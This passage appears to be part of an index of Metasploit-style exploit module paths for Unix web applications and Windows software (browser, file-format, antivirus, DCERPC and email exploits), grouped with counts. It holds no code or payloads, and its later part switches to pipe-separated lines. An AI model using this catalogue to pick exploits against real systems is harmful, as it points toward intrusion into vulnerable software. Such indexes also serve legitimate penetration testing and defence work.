    exploit/unix/webapp/coppermine_piceditor
    exploit/unix/webapp/datalife_preview_exec
    exploit/unix/webapp/dogfood_spell_exec
    exploit/unix/webapp/drupal_coder_exec
    exploit/unix/webapp/drupal_drupalgeddon2
    exploit/unix/webapp/drupal_restws_exec
    exploit/unix/webapp/drupal_restws_unserialize
    exploit/unix/webapp/egallery_upload_exec
    exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
    exploit/unix/webapp/flashchat_upload_exec
    exploit/unix/webapp/foswiki_maketext
    exploit/unix/webapp/freepbx_config_exec
    exploit/unix/webapp/fusionpbx_exec_cmd_exec
    exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec
    exploit/unix/webapp/generic_exec
    exploit/unix/webapp/get_simple_cms_upload_exec
    exploit/unix/webapp/google_proxystylesheet_exec
    exploit/unix/webapp/graphite_pickle_exec
    exploit/unix/webapp/guestbook_ssi_exec
    exploit/unix/webapp/hastymail_exec
    exploit/unix/webapp/havalite_upload_exec
    exploit/unix/webapp/horde_unserialize_exec
    exploit/unix/webapp/hybridauth_install_php_exec
    exploit/unix/webapp/instantcms_exec
    exploit/unix/webapp/invision_pboard_unserialize_exec
    exploit/unix/webapp/joomla_akeeba_unserialize
    exploit/unix/webapp/joomla_comfields_sqli_rce
    exploit/unix/webapp/joomla_comjce_imgmanager
    exploit/unix/webapp/joomla_contenthistory_sqli_rce
    exploit/unix/webapp/joomla_media_upload_exec
    exploit/unix/webapp/joomla_tinybrowser
    exploit/unix/webapp/jquery_file_upload
    exploit/unix/webapp/kimai_sqli
    exploit/unix/webapp/libretto_upload_exec
    exploit/unix/webapp/maarch_letterbox_file_upload
    exploit/unix/webapp/mambo_cache_lite
    exploit/unix/webapp/mitel_awc_exec
    exploit/unix/webapp/moinmoin_twikidraw
    exploit/unix/webapp/mybb_backdoor
    exploit/unix/webapp/nagios3_history_cgi
    exploit/unix/webapp/nagios3_statuswml_ping
    exploit/unix/webapp/nagios_graph_explorer
    exploit/unix/webapp/narcissus_backend_exec
    exploit/unix/webapp/open_flash_chart_upload_exec
    exploit/unix/webapp/openemr_sqli_privesc_upload
    exploit/unix/webapp/openemr_upload_exec
    exploit/unix/webapp/openmediavault_auth_cron_rce
    exploit/unix/webapp/openmediavault_rpc_rce
    exploit/unix/webapp/opennetadmin_ping_cmd_injection
    exploit/unix/webapp/opensis_chain_exec
    exploit/unix/webapp/opensis_modname_exec
    exploit/unix/webapp/openview_connectednodes_exec
    exploit/unix/webapp/openx_banner_edit
    exploit/unix/webapp/oracle_vm_agent_utl
    exploit/unix/webapp/oscommerce_filemanager
    exploit/unix/webapp/pajax_remote_exec
    exploit/unix/webapp/php_charts_exec
    exploit/unix/webapp/php_eval
    exploit/unix/webapp/php_include
    exploit/unix/webapp/php_vbulletin_template
    exploit/unix/webapp/php_xmlrpc_eval
    exploit/unix/webapp/phpbb_highlight
    exploit/unix/webapp/phpcollab_upload_exec
    exploit/unix/webapp/phpmyadmin_config
    exploit/unix/webapp/piwik_superuser_plugin_upload
    exploit/unix/webapp/projectpier_upload_exec
    exploit/unix/webapp/projectsend_upload_exec
    exploit/unix/webapp/qtss_parse_xml_exec
    exploit/unix/webapp/rconfig_install_cmd_exec
    exploit/unix/webapp/redmine_scm_exec
    exploit/unix/webapp/seportal_sqli_exec
    exploit/unix/webapp/simple_e_document_upload_exec
    exploit/unix/webapp/sixapart_movabletype_storable_exec
    exploit/unix/webapp/skybluecanvas_exec
    exploit/unix/webapp/sphpblog_file_upload
    exploit/unix/webapp/squash_yaml_exec
    exploit/unix/webapp/squirrelmail_pgp_plugin
    exploit/unix/webapp/sugarcrm_rest_unserialize_exec
    exploit/unix/webapp/sugarcrm_unserialize_exec
    exploit/unix/webapp/thinkphp_rce
    exploit/unix/webapp/tikiwiki_graph_formula_exec
    exploit/unix/webapp/tikiwiki_jhot_exec
    exploit/unix/webapp/tikiwiki_unserialize_exec
    exploit/unix/webapp/tikiwiki_upload_exec
    exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
    exploit/unix/webapp/trixbox_langchoice
    exploit/unix/webapp/tuleap_rest_unserialize_exec
    exploit/unix/webapp/tuleap_unserialize_exec
    exploit/unix/webapp/twiki_history
    exploit/unix/webapp/twiki_maketext
    exploit/unix/webapp/twiki_search
    exploit/unix/webapp/vbulletin_vote_sqli_exec
    exploit/unix/webapp/vicidial_agent_authenticated_rce
    exploit/unix/webapp/vicidial_manager_send_cmd_exec
    exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec
    exploit/unix/webapp/webmin_show_cgi_exec
    exploit/unix/webapp/webmin_upload_exec
    exploit/unix/webapp/webtester_exec
    exploit/unix/webapp/wp_admin_shell_upload
    exploit/unix/webapp/wp_advanced_custom_fields_exec
    exploit/unix/webapp/wp_ajax_load_more_file_upload
    exploit/unix/webapp/wp_asset_manager_upload_exec
    exploit/unix/webapp/wp_creativecontactform_file_upload
    exploit/unix/webapp/wp_downloadmanager_upload
    exploit/unix/webapp/wp_easycart_unrestricted_file_upload
    exploit/unix/webapp/wp_foxypress_upload
    exploit/unix/webapp/wp_frontend_editor_file_upload
    exploit/unix/webapp/wp_google_document_embedder_exec
    exploit/unix/webapp/wp_holding_pattern_file_upload
    exploit/unix/webapp/wp_inboundio_marketing_file_upload
    exploit/unix/webapp/wp_infinitewp_auth_bypass
    exploit/unix/webapp/wp_infusionsoft_upload
    exploit/unix/webapp/wp_lastpost_exec
    exploit/unix/webapp/wp_mobile_detector_upload_execute
    exploit/unix/webapp/wp_nmediawebsite_file_upload
    exploit/unix/webapp/wp_optimizepress_upload
    exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
    exploit/unix/webapp/wp_phpmailer_host_header
    exploit/unix/webapp/wp_pie_register_bypass_rce
    exploit/unix/webapp/wp_pixabay_images_upload
    exploit/unix/webapp/wp_plainview_activity_monitor_rce
    exploit/unix/webapp/wp_platform_exec
    exploit/unix/webapp/wp_property_upload_exec
    exploit/unix/webapp/wp_reflexgallery_file_upload
    exploit/unix/webapp/wp_revslider_upload_execute
    exploit/unix/webapp/wp_slideshowgallery_upload
    exploit/unix/webapp/wp_symposium_shell_upload
    exploit/unix/webapp/wp_total_cache_exec
    exploit/unix/webapp/wp_worktheflow_upload
    exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
    exploit/unix/webapp/wp_wpshop_ecommerce_file_upload
    exploit/unix/webapp/wp_wptouch_file_upload
    exploit/unix/webapp/wp_wysija_newsletters_upload
    exploit/unix/webapp/xoda_file_upload
    exploit/unix/webapp/xymon_useradm_cmd_exec
    exploit/unix/webapp/zeroshell_exec
    exploit/unix/webapp/zimbra_lfi
    exploit/unix/webapp/zoneminder_lang_exec
    exploit/unix/webapp/zoneminder_packagecontrol_exec
    exploit/unix/webapp/zoneminder_snapshots
    exploit/unix/webapp/zpanel_username_exec
  x11 (1)
    exploit/unix/x11/x11_keyboard_exec

windows (1193)
  antivirus (9)
    exploit/windows/antivirus/ams_hndlrsvc
    exploit/windows/antivirus/ams_xfr
    exploit/windows/antivirus/symantec_endpoint_manager_rce
    exploit/windows/antivirus/symantec_iao
    exploit/windows/antivirus/symantec_rtvscan
    exploit/windows/antivirus/symantec_workspace_streaming_exec
    exploit/windows/antivirus/trendmicro_serverprotect
    exploit/windows/antivirus/trendmicro_serverprotect_createbinding
    exploit/windows/antivirus/trendmicro_serverprotect_earthagent
  arkeia (1)
    exploit/windows/arkeia/type77
  backdoor (1)
    exploit/windows/backdoor/energizer_duo_payload
  backupexec (3)
    exploit/windows/backupexec/name_service
    exploit/windows/backupexec/remote_agent
    exploit/windows/backupexec/ssl_uaf
  brightstor (19)
    exploit/windows/brightstor/ca_arcserve_342
    exploit/windows/brightstor/discovery_tcp
    exploit/windows/brightstor/discovery_udp
    exploit/windows/brightstor/etrust_itm_alert
    exploit/windows/brightstor/hsmserver
    exploit/windows/brightstor/lgserver
    exploit/windows/brightstor/lgserver_multi
    exploit/windows/brightstor/lgserver_rxrlogin
    exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter
    exploit/windows/brightstor/lgserver_rxsuselicenseini
    exploit/windows/brightstor/license_gcr
    exploit/windows/brightstor/mediasrv_sunrpc
    exploit/windows/brightstor/message_engine
    exploit/windows/brightstor/message_engine_72
    exploit/windows/brightstor/message_engine_heap
    exploit/windows/brightstor/sql_agent
    exploit/windows/brightstor/tape_engine
    exploit/windows/brightstor/tape_engine_0x8a
    exploit/windows/brightstor/universal_agent
  browser (246)
    exploit/windows/browser/adobe_cooltype_sing
    exploit/windows/browser/adobe_flash_avm2
    exploit/windows/browser/adobe_flash_casi32_int_overflow
    exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
    exploit/windows/browser/adobe_flash_domain_memory_uaf
    exploit/windows/browser/adobe_flash_filters_type_confusion
    exploit/windows/browser/adobe_flash_mp4_cprt
    exploit/windows/browser/adobe_flash_otf_font
    exploit/windows/browser/adobe_flash_pcre
    exploit/windows/browser/adobe_flash_regex_value
    exploit/windows/browser/adobe_flash_rtmp
    exploit/windows/browser/adobe_flash_sps
    exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
    exploit/windows/browser/adobe_flash_worker_byte_array_uaf
    exploit/windows/browser/adobe_flashplayer_arrayindexing
    exploit/windows/browser/adobe_flashplayer_avm
    exploit/windows/browser/adobe_flashplayer_flash10o
    exploit/windows/browser/adobe_flashplayer_newfunction
    exploit/windows/browser/adobe_flatedecode_predictor02
    exploit/windows/browser/adobe_geticon
    exploit/windows/browser/adobe_jbig2decode
    exploit/windows/browser/adobe_media_newplayer
    exploit/windows/browser/adobe_shockwave_rcsl_corruption
    exploit/windows/browser/adobe_toolbutton
    exploit/windows/browser/adobe_utilprintf
    exploit/windows/browser/advantech_webaccess_dvs_getcolor
    exploit/windows/browser/aim_goaway
    exploit/windows/browser/aladdin_choosefilepath_bof
    exploit/windows/browser/amaya_bdo
    exploit/windows/browser/aol_ampx_convertfile
    exploit/windows/browser/aol_icq_downloadagent
    exploit/windows/browser/apple_itunes_playlist
    exploit/windows/browser/apple_quicktime_marshaled_punk
    exploit/windows/browser/apple_quicktime_mime_type
    exploit/windows/browser/apple_quicktime_rdrf
    exploit/windows/browser/apple_quicktime_rtsp
    exploit/windows/browser/apple_quicktime_smil_debug
    exploit/windows/browser/apple_quicktime_texml_font_table
    exploit/windows/browser/ask_shortformat
    exploit/windows/browser/asus_net4switch_ipswcom
    exploit/windows/browser/athocgov_completeinstallation
    exploit/windows/browser/autodesk_idrop
    exploit/windows/browser/aventail_epi_activex
    exploit/windows/browser/awingsoft_web3d_bof
    exploit/windows/browser/awingsoft_winds3d_sceneurl
    exploit/windows/browser/baofeng_storm_onbeforevideodownload
    exploit/windows/browser/barcode_ax49
    exploit/windows/browser/blackice_downloadimagefileurl
    exploit/windows/browser/c6_messenger_downloaderactivex
    exploit/windows/browser/ca_brightstor_addcolumn
    exploit/windows/browser/chilkat_crypt_writefile
    exploit/windows/browser/chrome_filereader_uaf
    exploit/windows/browser/cisco_anyconnect_exec
    exploit/windows/browser/cisco_playerpt_setsource
    exploit/windows/browser/cisco_playerpt_setsource_surl
    exploit/windows/browser/cisco_webex_ext
    exploit/windows/browser/citrix_gateway_actx
    exploit/windows/browser/clear_quest_cqole
    exploit/windows/browser/communicrypt_mail_activex
    exploit/windows/browser/creative_software_cachefolder
    exploit/windows/browser/crystal_reports_printcontrol
    exploit/windows/browser/dell_webcam_crazytalk
    exploit/windows/browser/dxstudio_player_exec
    exploit/windows/browser/ea_checkrequirements
    exploit/windows/browser/ebook_flipviewer_fviewerloading
    exploit/windows/browser/enjoysapgui_comp_download
    exploit/windows/browser/enjoysapgui_preparetoposthtml
    exploit/windows/browser/exodus
    exploit/windows/browser/facebook_extractiptc
    exploit/windows/browser/firefox_smil_uaf
    exploit/windows/browser/foxit_reader_plugin_url_bof
    exploit/windows/browser/getgodm_http_response_bof
    exploit/windows/browser/gom_openurl
    exploit/windows/browser/greendam_url
    exploit/windows/browser/honeywell_hscremotedeploy_exec
    exploit/windows/browser/honeywell_tema_exec
    exploit/windows/browser/hp_alm_xgo_setshapenodetype_exec
    exploit/windows/browser/hp_easy_printer_care_xmlcachemgr
    exploit/windows/browser/hp_easy_printer_care_xmlsimpleaccessor
    exploit/windows/browser/hp_loadrunner_addfile
    exploit/windows/browser/hp_loadrunner_addfolder
    exploit/windows/browser/hp_loadrunner_writefilebinary
    exploit/windows/browser/hp_loadrunner_writefilestring
    exploit/windows/browser/hpmqc_progcolor
    exploit/windows/browser/hyleos_chemviewx_activex
    exploit/windows/browser/ibm_spss_c1sizer
    exploit/windows/browser/ibm_tivoli_pme_activex_bof
    exploit/windows/browser/ibmegath_getxmlvalue
    exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule
    exploit/windows/browser/ie_cbutton_uaf
    exploit/windows/browser/ie_cgenericelement_uaf
    exploit/windows/browser/ie_createobject
    exploit/windows/browser/ie_execcommand_uaf
    exploit/windows/browser/ie_iscomponentinstalled
    exploit/windows/browser/ie_setmousecapture_uaf
    exploit/windows/browser/ie_unsafe_scripting
    exploit/windows/browser/imgeviewer_tifmergemultifiles
    exploit/windows/browser/indusoft_issymbol_internationalseparator
    exploit/windows/browser/inotes_dwa85w_bof
    exploit/windows/browser/intrust_annotatex_add
    exploit/windows/browser/java_basicservice_impl
    exploit/windows/browser/java_cmm
    exploit/windows/browser/java_codebase_trust
    exploit/windows/browser/java_docbase_bof
    exploit/windows/browser/java_mixer_sequencer
    exploit/windows/browser/java_ws_arginject_altjvm
    exploit/windows/browser/java_ws_double_quote
    exploit/windows/browser/java_ws_vmargs
    exploit/windows/browser/juniper_sslvpn_ive_setupdll
    exploit/windows/browser/kazaa_altnet_heap
    exploit/windows/browser/keyhelp_launchtripane_exec
    exploit/windows/browser/logitechvideocall_start
    exploit/windows/browser/lpviewer_url
    exploit/windows/browser/macrovision_downloadandexecute
    exploit/windows/browser/macrovision_unsafe
    exploit/windows/browser/malwarebytes_update_exec
    exploit/windows/browser/maxthon_history_xcs
    exploit/windows/browser/mcafee_mcsubmgr_vsprintf
    exploit/windows/browser/mcafee_mvt_exec
    exploit/windows/browser/mcafeevisualtrace_tracetarget
    exploit/windows/browser/mirc_irc_url
    exploit/windows/browser/mozilla_attribchildremoved
    exploit/windows/browser/mozilla_firefox_onreadystatechange
    exploit/windows/browser/mozilla_firefox_xmlserializer
    exploit/windows/browser/mozilla_interleaved_write
    exploit/windows/browser/mozilla_mchannel
    exploit/windows/browser/mozilla_nssvgvalue
    exploit/windows/browser/mozilla_nstreerange
    exploit/windows/browser/mozilla_reduceright
    exploit/windows/browser/ms03_020_ie_objecttype
    exploit/windows/browser/ms05_054_onload
    exploit/windows/browser/ms06_001_wmf_setabortproc
    exploit/windows/browser/ms06_013_createtextrange
    exploit/windows/browser/ms06_055_vml_method
    exploit/windows/browser/ms06_057_webview_setslice
    exploit/windows/browser/ms06_067_keyframe
    exploit/windows/browser/ms06_071_xml_core
    exploit/windows/browser/ms07_017_ani_loadimage_chunksize
    exploit/windows/browser/ms08_041_snapshotviewer
    exploit/windows/browser/ms08_053_mediaencoder
    exploit/windows/browser/ms08_070_visual_studio_msmask
    exploit/windows/browser/ms08_078_xml_corruption
    exploit/windows/browser/ms09_002_memory_corruption
    exploit/windows/browser/ms09_043_owc_htmlurl
    exploit/windows/browser/ms09_043_owc_msdso
    exploit/windows/browser/ms09_072_style_object
    exploit/windows/browser/ms10_002_aurora
    exploit/windows/browser/ms10_002_ie_object
    exploit/windows/browser/ms10_018_ie_behaviors
    exploit/windows/browser/ms10_018_ie_tabular_activex
    exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
    exploit/windows/browser/ms10_026_avi_nsamplespersec
    exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
    exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    exploit/windows/browser/ms10_090_ie_css_clip
    exploit/windows/browser/ms11_003_ie_css_import
    exploit/windows/browser/ms11_050_mshtml_cobjectelement
    exploit/windows/browser/ms11_081_option
    exploit/windows/browser/ms11_093_ole32
    exploit/windows/browser/ms12_004_midi
    exploit/windows/browser/ms12_037_ie_colspan
    exploit/windows/browser/ms12_037_same_id
    exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
    exploit/windows/browser/ms13_022_silverlight_script_object
    exploit/windows/browser/ms13_037_svg_dashstyle
    exploit/windows/browser/ms13_055_canchor
    exploit/windows/browser/ms13_059_cflatmarkuppointer
    exploit/windows/browser/ms13_069_caret
    exploit/windows/browser/ms13_080_cdisplaypointer
    exploit/windows/browser/ms13_090_cardspacesigninhelper
    exploit/windows/browser/ms14_012_cmarkup_uaf
    exploit/windows/browser/ms14_012_textrange
    exploit/windows/browser/ms14_064_ole_code_execution
    exploit/windows/browser/ms16_051_vbscript
    exploit/windows/browser/msvidctl_mpeg2
    exploit/windows/browser/mswhale_checkforupdates
    exploit/windows/browser/msxml_get_definition_code_exec
    exploit/windows/browser/nctaudiofile2_setformatlikesample
    exploit/windows/browser/nis2004_antispam
    exploit/windows/browser/nis2004_get
    exploit/windows/browser/notes_handler_cmdinject
    exploit/windows/browser/novell_groupwise_gwcls1_actvx
    exploit/windows/browser/novelliprint_callbackurl
    exploit/windows/browser/novelliprint_datetime
    exploit/windows/browser/novelliprint_executerequest
    exploit/windows/browser/novelliprint_executerequest_dbg
    exploit/windows/browser/novelliprint_getdriversettings
    exploit/windows/browser/novelliprint_getdriversettings_2
    exploit/windows/browser/novelliprint_target_frame
    exploit/windows/browser/ntr_activex_check_bof
    exploit/windows/browser/ntr_activex_stopmodule
    exploit/windows/browser/oracle_autovue_setmarkupmode
    exploit/windows/browser/oracle_dc_submittoexpress
    exploit/windows/browser/oracle_webcenter_checkoutandopen
    exploit/windows/browser/orbit_connecting
    exploit/windows/browser/ovftool_format_string
    exploit/windows/browser/pcvue_func
    exploit/windows/browser/persits_xupload_traversal
    exploit/windows/browser/quickr_qp2_bof
exploit/windows/browser/real_arcade_installerdlg | exploit/windows/browser/realplayer_cdda_uri | exploit/windows/browser/realplayer_console | exploit/windows/browser/realplayer_import | exploit/windows/browser/realplayer_qcp | exploit/windows/browser/realplayer_smil | exploit/windows/browser/roxio_cineplayer | exploit/windows/browser/safari_xslt_output | exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof | exploit/windows/browser/samsung_security_manager_put | exploit/windows/browser/sapgui_saveviewtosessionfile | exploit/windows/browser/siemens_solid_edge_selistctrlx | exploit/windows/browser/softartisans_getdrivename | exploit/windows/browser/sonicwall_addrouteentry | exploit/windows/browser/symantec_altirisdeployment_downloadandinstall | exploit/windows/browser/symantec_altirisdeployment_runcmd | exploit/windows/browser/symantec_appstream_unsafe | exploit/windows/browser/symantec_backupexec_pvcalendar | exploit/windows/browser/symantec_consoleutilities_browseandsavefile | exploit/windows/browser/synactis_connecttosynactis_bof | exploit/windows/browser/systemrequirementslab_unsafe | exploit/windows/browser/teechart_pro | exploit/windows/browser/tom_sawyer_tsgetx71ex552 | exploit/windows/browser/trendmicro_extsetowner | exploit/windows/browser/trendmicro_officescan | exploit/windows/browser/tumbleweed_filetransfer | exploit/windows/browser/ubisoft_uplay_cmd_exec | exploit/windows/browser/ultramjcam_openfiledig_bof | exploit/windows/browser/ultraoffice_httpupload | exploit/windows/browser/verypdf_pdfview | exploit/windows/browser/viscom_movieplayer_drawtext | exploit/windows/browser/vlc_amv | exploit/windows/browser/vlc_mms_bof | exploit/windows/browser/webdav_dll_hijacker | exploit/windows/browser/webex_ucf_newobject | exploit/windows/browser/wellintech_kingscada_kxclientdownload | exploit/windows/browser/winamp_playlist_unc | exploit/windows/browser/winamp_ultravox | exploit/windows/browser/windvd7_applicationtype | 
exploit/windows/browser/winzip_fileview | exploit/windows/browser/wmi_admintools | exploit/windows/browser/x360_video_player_set_text_bof | exploit/windows/browser/xmplay_asx | exploit/windows/browser/yahoomessenger_fvcom | exploit/windows/browser/yahoomessenger_server | exploit/windows/browser/zenturiprogramchecker_unsafe | exploit/windows/browser/zenworks_helplauncher_exec | . | dcerpc (5) . | exploit/windows/dcerpc/cve_2021_1675_printnightmare | exploit/windows/dcerpc/ms03_026_dcom | exploit/windows/dcerpc/ms05_017_msmq | exploit/windows/dcerpc/ms07_029_msdns_zonename | exploit/windows/dcerpc/ms07_065_msmq | . | email (3) . | exploit/windows/email/ms07_017_ani_loadimage_chunksize | exploit/windows/email/ms10_045_outlook_ref_only | exploit/windows/email/ms10_045_outlook_ref_resolve | . | emc (4) . | exploit/windows/emc/alphastor_agent | exploit/windows/emc/alphastor_device_manager_exec | exploit/windows/emc/networker_format_string | exploit/windows/emc/replication_manager_exec | . | fileformat (189) . 
| exploit/windows/fileformat/a_pdf_wav_to_mp3 | exploit/windows/fileformat/abbs_amp_lst | exploit/windows/fileformat/acdsee_fotoslate_string | exploit/windows/fileformat/acdsee_xpm | exploit/windows/fileformat/actfax_import_users_bof | exploit/windows/fileformat/activepdf_webgrabber | exploit/windows/fileformat/adobe_collectemailinfo | exploit/windows/fileformat/adobe_cooltype_sing | exploit/windows/fileformat/adobe_flashplayer_button | exploit/windows/fileformat/adobe_flashplayer_newfunction | exploit/windows/fileformat/adobe_flatedecode_predictor02 | exploit/windows/fileformat/adobe_geticon | exploit/windows/fileformat/adobe_illustrator_v14_eps | exploit/windows/fileformat/adobe_jbig2decode | exploit/windows/fileformat/adobe_libtiff | exploit/windows/fileformat/adobe_media_newplayer | exploit/windows/fileformat/adobe_pdf_embedded_exe | exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs | exploit/windows/fileformat/adobe_reader_u3d | exploit/windows/fileformat/adobe_toolbutton | exploit/windows/fileformat/adobe_u3d_meshdecl | exploit/windows/fileformat/adobe_utilprintf | exploit/windows/fileformat/allplayer_m3u_bof | exploit/windows/fileformat/altap_salamander_pdb | exploit/windows/fileformat/aol_desktop_linktag | exploit/windows/fileformat/aol_phobos_bof | exploit/windows/fileformat/apple_quicktime_pnsize | exploit/windows/fileformat/apple_quicktime_rdrf | exploit/windows/fileformat/apple_quicktime_texml | exploit/windows/fileformat/audio_coder_m3u | exploit/windows/fileformat/audio_wkstn_pls | exploit/windows/fileformat/audiotran_pls | exploit/windows/fileformat/audiotran_pls_1424 | exploit/windows/fileformat/aviosoft_plf_buf | exploit/windows/fileformat/bacnet_csv | exploit/windows/fileformat/beetel_netconfig_ini_bof | exploit/windows/fileformat/blazedvd_hdtv_bof | exploit/windows/fileformat/blazedvd_plf | exploit/windows/fileformat/boxoft_wav_to_mp3 | exploit/windows/fileformat/bpftp_client_bps_bof | exploit/windows/fileformat/bsplayer_m3u | 
exploit/windows/fileformat/ca_cab | exploit/windows/fileformat/cain_abel_4918_rdp | exploit/windows/fileformat/ccmplayer_m3u_bof | exploit/windows/fileformat/chasys_draw_ies_bmp_bof | exploit/windows/fileformat/coolpdf_image_stream_bof | exploit/windows/fileformat/corelpdf_fusion_bof | exploit/windows/fileformat/csound_getnum_bof | exploit/windows/fileformat/cutezip_bof | exploit/windows/fileformat/cve_2017_8464_lnk_rce | exploit/windows/fileformat/cyberlink_lpp_bof | exploit/windows/fileformat/cyberlink_p2g_bof | exploit/windows/fileformat/cytel_studio_cy3 | exploit/windows/fileformat/deepburner_path | exploit/windows/fileformat/destinymediaplayer16 | exploit/windows/fileformat/digital_music_pad_pls | exploit/windows/fileformat/djstudio_pls_bof | exploit/windows/fileformat/djvu_imageurl | exploit/windows/fileformat/documalis_pdf_editor_and_scanner | exploit/windows/fileformat/dupscout_xml | exploit/windows/fileformat/dvdx_plf_bof | exploit/windows/fileformat/easycdda_pls_bof | exploit/windows/fileformat/emc_appextender_keyworks | exploit/windows/fileformat/erdas_er_viewer_bof | exploit/windows/fileformat/erdas_er_viewer_rf_report_error | exploit/windows/fileformat/esignal_styletemplate_bof | exploit/windows/fileformat/etrust_pestscan | exploit/windows/fileformat/ezip_wizard_bof | exploit/windows/fileformat/fatplayer_wav | exploit/windows/fileformat/fdm_torrent | exploit/windows/fileformat/feeddemon_opml | exploit/windows/fileformat/foxit_reader_filewrite | exploit/windows/fileformat/foxit_reader_launch | exploit/windows/fileformat/foxit_reader_uaf | exploit/windows/fileformat/foxit_title_bof | exploit/windows/fileformat/free_mp3_ripper_wav | exploit/windows/fileformat/galan_fileformat_bof | exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634 | exploit/windows/fileformat/gsm_sim | exploit/windows/fileformat/gta_samp | exploit/windows/fileformat/hhw_hhp_compiledfile_bof | exploit/windows/fileformat/hhw_hhp_contentfile_bof | 
exploit/windows/fileformat/hhw_hhp_indexfile_bof | exploit/windows/fileformat/homm3_h3m | exploit/windows/fileformat/ht_mp3player_ht3_bof | exploit/windows/fileformat/ibm_forms_viewer_fontname | exploit/windows/fileformat/ibm_pcm_ws | exploit/windows/fileformat/icofx_bof | exploit/windows/fileformat/ideal_migration_ipj | exploit/windows/fileformat/iftp_schedule_bof | exploit/windows/fileformat/irfanview_jpeg2000_bof | exploit/windows/fileformat/ispvm_xcf_ispxcf | exploit/windows/fileformat/kingview_kingmess_kvl | exploit/windows/fileformat/lattice_pac_bof | exploit/windows/fileformat/lotusnotes_lzh | exploit/windows/fileformat/magix_musikmaker_16_mmm | exploit/windows/fileformat/mcafee_hercules_deletesnapshot | exploit/windows/fileformat/mcafee_showreport_exec | exploit/windows/fileformat/mediacoder_m3u | exploit/windows/fileformat/mediajukebox | exploit/windows/fileformat/microp_mppl | exploit/windows/fileformat/microsoft_windows_contact | exploit/windows/fileformat/millenium_mp3_pls | exploit/windows/fileformat/mini_stream_pls_bof | exploit/windows/fileformat/mjm_coreplayer2011_s3m | exploit/windows/fileformat/mjm_quickplayer_s3m | exploit/windows/fileformat/moxa_mediadbplayback | exploit/windows/fileformat/mplayer_m3u_bof | exploit/windows/fileformat/mplayer_sami_bof | exploit/windows/fileformat/ms09_067_excel_featheader | exploit/windows/fileformat/ms10_004_textbytesatom | exploit/windows/fileformat/ms10_038_excel_obj_bof | exploit/windows/fileformat/ms10_087_rtf_pfragments_bof | exploit/windows/fileformat/ms11_006_createsizeddibsection | exploit/windows/fileformat/ms11_021_xlb_bof | exploit/windows/fileformat/ms12_005 | exploit/windows/fileformat/ms12_027_mscomctl_bof | exploit/windows/fileformat/ms13_071_theme | exploit/windows/fileformat/ms14_017_rtf | exploit/windows/fileformat/ms14_060_sandworm | exploit/windows/fileformat/ms14_064_packager_python | exploit/windows/fileformat/ms14_064_packager_run_as_admin | 
exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader | exploit/windows/fileformat/ms15_100_mcl_exe | exploit/windows/fileformat/ms_visual_basic_vbp | exploit/windows/fileformat/mswin_tiff_overflow | exploit/windows/fileformat/msworks_wkspictureinterface | exploit/windows/fileformat/mymp3player_m3u | exploit/windows/fileformat/netop | exploit/windows/fileformat/nitro_reader_jsapi | exploit/windows/fileformat/nuance_pdf_launch_overflow | exploit/windows/fileformat/office_dde_delivery | exploit/windows/fileformat/office_excel_slk | exploit/windows/fileformat/office_ms17_11882 | exploit/windows/fileformat/office_ole_multiple_dll_hijack | exploit/windows/fileformat/office_word_hta | exploit/windows/fileformat/openoffice_ole | exploit/windows/fileformat/orbit_download_failed_bof | exploit/windows/fileformat/orbital_viewer_orb | exploit/windows/fileformat/ovf_format_string | exploit/windows/fileformat/proshow_cellimage_bof | exploit/windows/fileformat/proshow_load_bof | exploit/windows/fileformat/publishit_pui | exploit/windows/fileformat/real_networks_netzip_bof | exploit/windows/fileformat/real_player_url_property_bof | exploit/windows/fileformat/realplayer_ver_attribute_bof | exploit/windows/fileformat/safenet_softremote_groupname | exploit/windows/fileformat/sascam_get | exploit/windows/fileformat/scadaphone_zip | exploit/windows/fileformat/shadow_stream_recorder_bof | exploit/windows/fileformat/shaper_pdf_bof | exploit/windows/fileformat/somplplayer_m3u | exploit/windows/fileformat/subtitle_processor_m3u_bof | exploit/windows/fileformat/syncbreeze_xml | exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof | exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146 | exploit/windows/fileformat/total_video_player_ini_bof | exploit/windows/fileformat/tugzip | exploit/windows/fileformat/ultraiso_ccd | exploit/windows/fileformat/ultraiso_cue | exploit/windows/fileformat/ursoft_w32dasm | exploit/windows/fileformat/varicad_dwb | 
exploit/windows/fileformat/videocharge_studio | exploit/windows/fileformat/videolan_tivo | exploit/windows/fileformat/videospirit_visprj | exploit/windows/fileformat/visio_dxf_bof | exploit/windows/fileformat/visiwave_vwr_type | exploit/windows/fileformat/vlc_mkv | exploit/windows/fileformat/vlc_modplug_s3m | exploit/windows/fileformat/vlc_realtext | exploit/windows/fileformat/vlc_smb_uri | exploit/windows/fileformat/vlc_webm | exploit/windows/fileformat/vuplayer_cue | exploit/windows/fileformat/vuplayer_m3u | exploit/windows/fileformat/watermark_master | exploit/windows/fileformat/winamp_maki_bof | exploit/windows/fileformat/winrar_ace | exploit/windows/fileformat/winrar_cve_2023_38831 | exploit/windows/fileformat/winrar_name_spoofing | exploit/windows/fileformat/wireshark_mpeg_overflow | exploit/windows/fileformat/wireshark_packet_dect | exploit/windows/fileformat/wm_downloader_m3u | exploit/windows/fileformat/word_msdtjs_rce | exploit/windows/fileformat/word_mshtml_rce | exploit/windows/fileformat/xenorate_xpl_bof | exploit/windows/fileformat/xion_m3u_sehbof | exploit/windows/fileformat/xradio_xrl_sehbof | exploit/windows/fileformat/zahir_enterprise_plus_csv | exploit/windows/fileformat/zinfaudioplayer221_pls | . | firewall (2) . | exploit/windows/firewall/blackice_pam_icq | exploit/windows/firewall/kerio_auth | . | ftp (65) . 
